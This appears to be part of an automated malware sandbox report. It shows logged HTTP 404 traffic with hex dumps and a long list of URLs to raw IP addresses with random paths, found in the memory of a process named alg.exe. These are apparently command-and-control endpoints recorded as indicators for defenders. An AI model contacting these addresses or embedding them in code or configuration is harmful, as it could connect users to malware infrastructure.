6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:03:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Tue, 05 Nov 2024 16:04:03 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Tue, 05 Nov 2024 16:04:11 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:04:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:04:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 05 Nov 2024 16:04:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2726508164.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
                        Source: alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/(UF
                        Source: alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/4
                        Source: alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/7
                        Source: alg.exe, 00000005.00000003.2538471760.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2530063854.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/F
                        Source: alg.exe, 00000005.00000003.2406458559.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/b
                        Source: alg.exe, 00000005.00000003.2421364608.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/b;:
                        Source: alg.exe, 00000005.00000003.2406458559.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/bA
                        Source: alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/bs
                        Source: alg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/ghraajhdo
                        Source: alg.exe, 00000005.00000003.2811918640.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789033998.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2835349419.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2802192029.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2823194050.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2743038137.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2755280881.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/gkytxybgvmhelxm
                        Source: alg.exe, 00000005.00000003.3114457566.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/nuxw/
                        Source: alg.exe, 00000005.00000003.3049728278.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3039039021.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2994346081.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2926285208.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3014767523.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2958285127.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2960157911.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2975754549.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3023493626.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2998082643.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3098884658.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2924610727.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2940973706.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3083445109.00000000004D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.251.16.150/qlckdyepimpj
                        Source: alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/uxw
                        Source: alg.exe, 00000005.00000003.2407212765.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2406458559.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/bW
                        Source: alg.exe, 00000005.00000003.2726508164.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/ghraajhdoy
                        Source: alg.exe, 00000005.00000003.2789033998.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/nuxw
                        Source: alg.exe, 00000005.00000003.2529312327.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/nwcfdqaloklmslqo
                        Source: alg.exe, 00000005.00000003.2924953400.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/qlckdyepimpj
                        Source: alg.exe, 00000005.00000003.2976836781.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/rgh
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/4s/
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/7
                        Source: alg.exe, 00000005.00000003.2586780746.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/mwix
                        Source: alg.exe, 00000005.00000003.2586093883.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/ahktjonxxxw
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462147543.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2475832779.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138//
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/3
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/;
                        Source: alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/IO
                        Source: alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/blqwxioreon
                        Source: alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/blqwxioreons
                        Source: alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/eybmhvtk
                        Source: alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2475832779.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/p
                        Source: alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/qntnr
                        Source: alg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/qntnrk
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/s7
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/v
                        Source: alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/vfgrjxuhtsfio
                        Source: alg.exe, 00000005.00000003.2461628968.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2463088351.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/vfgrjxuhtsfioI
                        Source: alg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/vfgrjxuhtsfioXwL
                        Source: alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189007614.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2188900760.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/blqwxioreon
                        Source: alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2198338428.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2198985007.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/eybmhvtkP4
                        Source: alg.exe, 00000005.00000003.2447576365.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2448344378.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/qntnr
                        Source: alg.exe, 00000005.00000003.2461628968.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2462147543.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/vfgrjxuhtsfio
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                        Source: alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aymirwrcjb
                        Source: alg.exe, 00000005.00000003.2438061645.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/aymirwrcjbc5fa
